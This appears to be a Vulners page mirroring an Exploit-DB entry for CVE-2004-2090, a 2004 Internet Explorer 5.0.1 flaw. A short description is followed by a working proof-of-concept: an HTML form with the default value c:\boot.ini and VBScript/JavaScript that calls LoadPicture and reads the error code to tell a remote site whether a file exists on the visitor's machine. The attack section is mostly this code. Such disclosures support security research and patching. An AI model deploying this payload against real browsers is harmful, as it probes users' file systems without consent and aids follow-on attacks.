Lucene search
+L

Microsoft Internet Explorer 5.0.1 - LoadPicture File Enumeration

🗓️ 07 Feb 2004 00:00:00Reported by JelmerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Microsoft Internet Explorer 5.0.1 can be exploited to enumerate files on the client system using VBScript.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2004-2090
19 May 200504:00
cve
Cvelist
CVE-2004-2090
19 May 200504:00
cvelist
NVD
CVE-2004-2090
7 Feb 200405:00
nvd
source: https://www.securityfocus.com/bid/9611/info

Microsoft Internet Explorer is prone to an issue that may permit a remote site to enumerate the existence of files on the client system.

This may be exploited via abuse of the VBScript LoadPicture method. Exploitation of the weakness may assist in other attacks which depend on the attacker being able to determine whether or not certain files on the system exist.

<form onsubmit="doIt(this);return false">
<input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>

<script language="vbscript">

Sub loadIt(filename)
LoadPicture(filename)
End Sub

</script>

<script language="javascript">

function doIt(form) {

try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}

if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Dec 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.16018
40